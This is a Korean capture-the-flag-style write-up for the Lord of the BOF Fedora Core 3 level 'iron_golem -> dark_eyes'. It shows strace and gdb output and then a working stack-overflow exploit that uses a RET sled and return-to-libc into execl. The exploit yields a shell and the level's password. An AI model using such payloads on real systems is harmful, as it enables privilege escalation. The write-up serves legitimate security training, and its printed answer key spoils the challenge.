[LOB_FC3] iron_golem -> dark_eyes
#Env
- NX
- ascii armor
- random stack
#Technic
- &ret sled로 RTL 인자 구성
dark_eyes.c 소스
sfp를 복구하는 과정이 추가 되어있고 힌트로 RET sleding을 주었다. RET sleding을 하는데 SFP는 필요 없으므로 "gate->iron_golem" 문제와 동일한 방법으로 풀면 되겠다.
[payload 작성]
[iron_golem@Fedora_1stFloor ~]$ strace -i ./dark_eyes `perl -e 'print "A"x270'`
[00004141] --- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,3094,48,0): No such process
[????????] +++ killed by SIGSEGV +++
[iron_golem@Fedora_1stFloor ~]$
=> 268 + 4byte(ret)인 것을 확인
(gdb) x/i 0x080484b9
0x80484b9 <main+177>: ret
(gdb) p execl
$2 = {<text variable, no debug info>} 0x7a5720 <execl>
(gdb) x/40x $esp+0x120
0xfef33920: 0x61616161 0x61616161 0x61616161 0x61616161
0xfef33930: 0x61616161 0x61616161 0x61616161 0x61616161
0xfef33940: 0x00000000 0xfef339c4 0xfef339d0 0x0070eab6
0xfef33950: 0x0083eff4 0x00000000 0xfef33950 0xfef33998
0xfef33960: 0xfef33940 0x00730df5 0x00000000 0x00000000
0xfef33970: 0x00000000 0x00718fb4 0x00000002 0x08048360
공격코드 : ./dark_eyes "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"
[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa삻蕓뭐 Wz
sh-3.00$ id
uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 502
because of you
sh-3.00$